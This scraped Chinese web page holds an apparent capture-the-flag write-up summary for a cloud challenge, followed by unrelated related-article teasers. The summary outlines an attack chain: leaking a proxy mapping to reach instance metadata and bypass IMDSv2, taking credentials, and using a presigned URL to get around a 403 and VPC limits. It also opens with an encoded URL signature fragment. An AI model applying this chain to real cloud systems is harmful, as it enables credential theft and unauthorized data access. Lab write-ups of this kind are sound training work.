%6a%43%6a%69%49%6b%77%44%39%69%25%32%46%65%54%25%32%46%78%78%50%4d%57%31%59%71%69%64%32%43%6b%42%4c%70%37%53%57%33%59%6a%65%71%4d%35%49%71%4b%76%66%50%68%71%74%4b%61%77%36%6d%4e%63%41%75%36%36%39%51%32%51%51%66%4c%51%56%38%48%75%51%62%54%44%30%45%66%39%70%79%38%49%38%54%54%31%34%4b%25%32%46%75%52%47%59%7a%75%68%75%32%47%31%4a%70%6f%62%51%4b%44%70%31%59%31%58%70%45%6c%73%6c%78%25%32%46%50%69%61%53%39%46%54%4a%48%73%7a%4d%25%32%42%58%63%61%51%6e%31%35%5a%62%46%57%73%73%74%47%72%6e%71%25%32%46%57%4a%53%51%7a%4d%54%77%66%6d%48%65%6a%68%65%7a%43%59%61%77%47%7a%25%32%42%58%37%76%76%64%48%48%6e%39%75%41%39%55%25%33%44%26%45%78%70%69%72%65%73%3d%31%37%35%32%31%37%31%34%38%37The flag is: ********成功总结总的来说真的是很有实战意义的一次挑战感觉整个过程前因后果是非常连贯的获取桶名称-不能匿名访问-获取配置信息-元数据不能直接访问-走代理mapping 泄露 proxy元数据绕过 IMDSv2 安全机制获取用户信息查看权限列取文件位置vpc 限制来联想 proxy403考虑预签名 URL 授予行云流水

相关新闻

AI大模型选型实战指南:成本、稳定性和数据安全三维决策

AI大模型选型实战指南:成本、稳定性和数据安全三维决策

1. 这不是“排行榜”,而是我用掉37个API密钥、跑通21个生产环境后筛出来的实战清单你点开这篇文章,大概率不是想看又一篇泛泛而谈的“2024十大AI模型推荐”。你可能刚被老板甩来一句“用AI写周报/改PPT/生成产品文案”,也可能在深夜调试RAG系…

2026/7/3 5:24:06阅读更多 →
Triton Puzzles(Demo1-4)

Triton Puzzles(Demo1-4)

Triton Puzzles 之前做tilelang puzzles的时候,发现readme里提到是仿照triton puzzles的,但当时感觉triton没有学的必要,就没做 最近发现triton的设计思想和tilelang差异很大,感觉可以开拓一下视野,就找到这个https://…

2026/7/3 5:19:05阅读更多 →
Linux更多bash shell命令实操完整笔记

Linux更多bash shell命令实操完整笔记

一、文章说明 本文完整实现PPT小结全部命令实操,搭建命令知识框架,附带全部操作流程与运行截图,重点演示 top 、 sort 、 grep 核心命令 二、进程管理命令:ps、top、kill ps 静态查看进程 命令用途 静态列出系统当前运行的进程&am…

2026/7/3 5:19:05阅读更多 →
3大颠覆性用法:重新定义网易云音乐API的无限可能

3大颠覆性用法:重新定义网易云音乐API的无限可能

3大颠覆性用法:重新定义网易云音乐API的无限可能 【免费下载链接】NeteaseCloudMusicApiBackup https://www.npmjs.com/package/NeteaseCloudMusicApi 项目地址: https://gitcode.com/gh_mirrors/ne/NeteaseCloudMusicApiBackup 凌晨三点,音乐应用…

2026/7/3 6:34:09阅读更多 →
Mac本地部署Llama3+RAG:零API、离线可用的私有AI工作流

Mac本地部署Llama3+RAG:零API、离线可用的私有AI工作流

1. 项目概述:当“大模型依赖症”遇上本地化实践自觉我试过把ChatGPT当全天候助理用——写周报、改邮件、查资料、编SQL,甚至帮孩子改作文。但三个月后,一个下午,我盯着屏幕上第7次“Oops, something went wrong”弹窗,…

2026/7/3 6:34:09阅读更多 →
零门槛学以太坊交易:用 Hardhat 本地环境替代 Sepolia 测试网

零门槛学以太坊交易:用 Hardhat 本地环境替代 Sepolia 测试网

学以太坊不一定要死磕测试网水龙头。Hardhat 本地节点自带 10000 ETH,出块秒到,是 Web3 开发者的标准学习路径。 一、为什么推荐从本地环境开始? 很多教程第一步就让你去 Sepolia 测试网领币,但实际操作时经常遇到网络验证、账户…

2026/7/3 6:34:09阅读更多 →
科研制图不用折腾多款软件,okbiye 网页 AI 绘图适配各阶段科研配图需求

科研制图不用折腾多款软件,okbiye 网页 AI 绘图适配各阶段科研配图需求

okbiye-免费查重复率aigc检测/开题报告/毕业论文/智能排版/文献综述/科研绘图科研绘图 - Okbiye智能写作https://www.okbiye.com/drawing 一、传统科研绘图痛点突出,多工具切换大幅拖慢论文进度 不管是在校学生写课程论文、毕业生做毕设,还是科研人员投…

2026/7/3 6:34:09阅读更多 →
AI绘图模型横评:中文文化语义与空间结构的硬核压力测试

AI绘图模型横评:中文文化语义与空间结构的硬核压力测试

1. 项目概述:一场不看宣传、只看画布的AI绘图模型实战横评你是不是也刷到过这样的标题:“Sora一出,所有AI绘画都该下岗”“文心一言4.5秒出图,细节吊打MidJourney”?我做了整整三个月的横向实测,把市面上能…

2026/7/3 6:34:09阅读更多 →
量化软件推荐怎么选:先看回测盯盘风控能不能连成流程

量化软件推荐怎么选:先看回测盯盘风控能不能连成流程

朋友问我量化软件怎么选,我一般不会先问哪个名字更响,而会问他能不能把想法写成规则、把规则放进历史样本里看一遍,再把信号提醒、仓位控制和复盘记录接起来。牛股王股票这类面向普通投资者的量化辅助软件,更适合想把回测、盯盘和…

2026/7/3 6:29:09阅读更多 →
AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

6个月前的2025年12月,Boris Cherny 公开宣布自己卸载了 IDE。一时间,Vibe Coding 成了全行业最热的话题。6个月后,当我们回过头来拉一份真实账本,发现事情远没有"一句话生成一个App"那么浪漫。本文从产品经理和研发两个…

2026/7/2 12:10:34阅读更多 →
审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

引言:审计结束三个月了,审计员的权限还没关某城商行每年按照监管要求开展至少一次数据安全审计。审计期间,内审部门需要抽样检查各类业务数据——交易流水、客户信息、员工操作日志、权限配置记录。这些数据分布在不同系统中,审计…

2026/7/2 12:10:34阅读更多 →
LV3296与PIC18F45K22的UART通信与USB扩展方案

LV3296与PIC18F45K22的UART通信与USB扩展方案

1. LV3296与PIC18F45K22的硬件搭档解析在嵌入式数据采集系统中,LV3296条形码扫描模块与PIC18F45K22微控制器的组合堪称经典搭配。LV3296作为一款工业级条码扫描头,其核心是一颗高性能CMOS图像传感器,配合专用解码芯片,能自动识别包…

2026/7/3 0:03:41阅读更多 →
AI初创生存指南:6个月完成可信度验证闭环

AI初创生存指南:6个月完成可信度验证闭环

1. 这不是“逆袭指南”,而是一份AI初创公司真实生存手记“How To Beat Odds As an AI Startup?”——这个标题乍看像一句热血口号,但在我带过7个从0到1的AI产品团队、亲手踩过融资失败、技术债崩盘、客户POC卡在最后一公里等23类典型坑之后,…

2026/7/3 0:03:41阅读更多 →
多模态+推理链+RAG 2.0+智能体:工业级AI系统落地四支柱

多模态+推理链+RAG 2.0+智能体:工业级AI系统落地四支柱

1. 这不是又一篇“AI趋势速览”,而是一份实操者手记:当多模态、推理链、检索增强与智能体协作真正撞进工程现场“LAI #73”这个编号本身就像一个暗号——它不属于某家大厂的白皮书,也不是学术会议的议程表,而是长期泡在模型训练集…

2026/7/3 0:03:41阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/3 1:12:46阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/3 1:36:36阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/3 2:08:15阅读更多 →